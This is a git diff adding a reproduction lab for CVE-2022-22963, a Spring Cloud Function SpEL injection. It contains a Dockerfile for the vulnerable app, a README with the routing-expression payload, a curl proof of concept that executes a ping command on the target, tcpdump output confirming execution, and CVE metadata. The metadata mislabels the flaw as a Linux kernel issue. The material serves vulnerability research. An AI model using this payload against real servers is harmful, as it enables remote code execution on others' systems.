diff --git a/cve/linux-kernel/2022/CVE-2022-22963/Dockerfile b/cve/linux-kernel/2022/CVE-2022-22963/Dockerfile new file mode 100644 index 0000000000000000000000000000000000000000..235626d465058fe112bce0c182509a08bddbf4af --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-22963/Dockerfile @@ -0,0 +1,6 @@ +FROM openjdk:17-alpine +MAINTAINER tester +EXPOSE 8080 +RUN mkdir /app +COPY ./jar/*.jar /app/spring-cloud-function-routing.jar +CMD ["java", "-jar", "/app/spring-cloud-function-routing.jar"] \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-22963/README.md b/cve/linux-kernel/2022/CVE-2022-22963/README.md new file mode 100644 index 0000000000000000000000000000000000000000..32df2b7208b5deb2c9dff628ba26577dd13442b6 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-22963/README.md @@ -0,0 +1,40 @@ +# Spring Cloud Function SpEL - cve-2022-22963 +## Build +```bash +$ git clone https://github.com/twseptian/cve-2022-22963.git +$ cd cve-2022-22963 +$ docker build . -t spring-spel-0day +$ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day +``` + +![docker run](docker_run.png) + +## Payload +```bash +spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("ping -c5 172.17.0.1") +``` +## PoC +run ping command, and take the responses from attacker machine +```bash +$ curl -i -s -k -X $'POST' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"ping -c5 172.17.0.1\")' -H $'Content-Type: application/x-www-form-urlencoded' $'http://172.17.0.2:8080/functionRouter' +``` +responses +```bash +$ sudo tcpdump icmp -i docker0 +tcpdump: verbose output suppressed, use -v[v]... for full protocol decode +listening on docker0, link-type EN10MB (Ethernet), snapshot length 262144 bytes +13:42:01.815194 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 0, length 64 +13:42:01.815209 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 0, length 64 +13:42:02.815571 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 1, length 64 +13:42:02.815594 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 1, length 64 +13:42:03.815985 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 2, length 64 +13:42:03.816009 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 2, length 64 +13:42:04.816389 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 3, length 64 +13:42:04.816426 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 3, length 64 +13:42:05.816751 IP 172.17.0.2 > 172.17.0.1: ICMP echo request, id 45, seq 4, length 64 +13:42:05.816775 IP 172.17.0.1 > 172.17.0.2: ICMP echo reply, id 45, seq 4, length 64 +``` + +## References +- [Spring-Cloud-Function-SpEL](https://github.com/Pizz33/Spring-Cloud-Function-SpEL) +- [漏洞复现-Spring Cloud Function SpEL表达式注入](https://pizz33.github.io/2022/03/27/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-Spring%20Cloud%20Function%20SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/) diff --git a/cve/linux-kernel/2022/CVE-2022-22963/docker_run.png b/cve/linux-kernel/2022/CVE-2022-22963/docker_run.png new file mode 100644 index 0000000000000000000000000000000000000000..2f013562c2500f7818a1bd8cf14d8b5bba11d7b7 Binary files /dev/null and b/cve/linux-kernel/2022/CVE-2022-22963/docker_run.png differ diff --git a/cve/linux-kernel/2022/CVE-2022-22963/jar/demo-0.0.1-SNAPSHOT.jar b/cve/linux-kernel/2022/CVE-2022-22963/jar/demo-0.0.1-SNAPSHOT.jar new file mode 100644 index 0000000000000000000000000000000000000000..0c62da5faceaec23d5ee27e4919001d03ec1ed1c Binary files /dev/null and b/cve/linux-kernel/2022/CVE-2022-22963/jar/demo-0.0.1-SNAPSHOT.jar differ diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-22963.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-22963.yaml new file mode 100644 index 0000000000000000000000000000000000000000..ab724d677f50d89eafda540331e8c38a23088deb --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-22963.yaml @@ -0,0 +1,21 @@ +id: CVE-2022-22963 +source: https://github.com/twseptian/cve-2022-22963 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: critical + description: | + In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + scope-of-influence: + 3.0-rc1~3.2.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005 + - https://tanzu.vmware.com/security/cve-2022-22963 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: 漏洞复现, 表达式注入 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 897401dfd5e870b030788445d302e79e80a5a840..f3e984fcef26850a071cd7d0cbeb0f06d9c5b624 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -40,6 +40,7 @@ cve: - CVE-2022-0435 - CVE-2021-26708 - CVE-2022-2078 + - CVE-2022-22963 sudo: - CVE-2021-3156 - CVE-2023-22809